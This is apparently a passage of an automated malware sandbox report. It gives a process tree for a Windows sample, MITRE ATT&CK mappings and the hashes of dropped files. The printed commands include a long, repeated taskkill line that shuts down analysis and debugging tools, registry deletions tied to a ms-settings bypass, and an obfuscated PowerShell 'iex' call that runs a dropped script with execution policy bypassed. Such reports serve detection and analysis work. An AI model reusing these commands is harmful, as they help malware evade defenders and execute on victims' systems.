        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:396
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:2780
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:3772
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:2288
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4052
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:560
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3348
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:1300
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:3764
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3228
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3596
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3020
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:1540
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4700
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3508
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:1740
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2012
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:772
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:4004
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4576
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:3536
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:3716
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1492
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:3588
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4544
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:4588
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:2888
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2572
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1844
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.alecar\ /f
    3⤵
    - Modifies registry class
    - Modifies registry key
    PID:4944
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f
    3⤵
    - Modifies registry class
    - Modifies registry key
    PID:2420
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start C:/ProgramData/Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas
    3⤵
    PID:2588
  - - C:\ProgramData\Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas
      C:/ProgramData/Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas
      4⤵
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2296
    - - C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHeLl.exe
        
        PoWeRsHeLl Remove-Item C:/ProgramData/SecureConnectionTunnel.ps1
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:224
    - - C:\ProgramData\DefendSecurity\SystemSettings.Security
        
        C:\ProgramData\DefendSecurity\SystemSettings.Security -ExEc Bypass -Command "& {&('i'+'ex') (gc -Raw -Path 'C:\pRogRaMdatA\lH6gEw462770nr1F7u0UreGjd00tSTq06Bu1TNUVU8DHmb4TtL9TmS7H2.brk')}"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\DefendSecurity\SystemSettings.Security

Filesize
445KB

MD5
2e5a8590cf6848968fc23de3fa1e25f1

SHA1
801262e122db6a2e758962896f260b55bbd0136a

SHA256
9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3

SHA512
5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8

Download Submit
C:\ProgramData\VipPassword.txt

Filesize
21B

MD5
025f05f1bfe43214b5b56139a528db2b

SHA1
6aac59ae2b474aedd4773c170d2a4685a0aee65d

SHA256
7e3b7a5ee2f8b0bb96d2e729b7e58b06645191b9b9d550db5fa1937fa9aa6b13

SHA512
a2e72695f2094e43a99991557b381f9d8d9e7252173a1792002f530b4e87e92e37b53edcafb2d9d024f81a223ec3f5457aeb1f5cf70cf5fe3fe9ad71f49bd561

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PoWeRsHeLl.exe.log

Filesize
5KB

MD5
56816abd1ac26127db6db8d9152f827b

SHA1
e916d14e71de32f5e6cb4bac3ef7435d19240c46

SHA256
255ef23fee3796c3d05335b800f00df92868e8aa6b7a9069c3105788495af0e1

SHA512
89b32b648c6519b7764437bc9aff5363abc481e639a72bc892820a753e711d46e7cf3d7df3f09c7eac65a4ee67db53aeb4ed911a5650091494a2d6bd7566e0f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
55KB

MD5
e72bbbbd6da01c06978525b270288b4f

SHA1
a4663ffda64a907ab9360be063a930d9004f00ce

SHA256
e625a11fdb99470f53e5b8d41f7b3cbf191a221712065e450762febe1409a7f4

SHA512
87874ddba6bfa8ed689ac1ae9894a7dd61f8ee7ed9abb26e13dabe71fc1900c8a8d00c7569181881a887666a8bc75444494052c4ec3eb84873c8bfe35679806b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
add21e944e7d1eabd4286d06ace27335

SHA1
359c0666aa55e4dd14834d7fb88ef2a794c05d56

SHA256
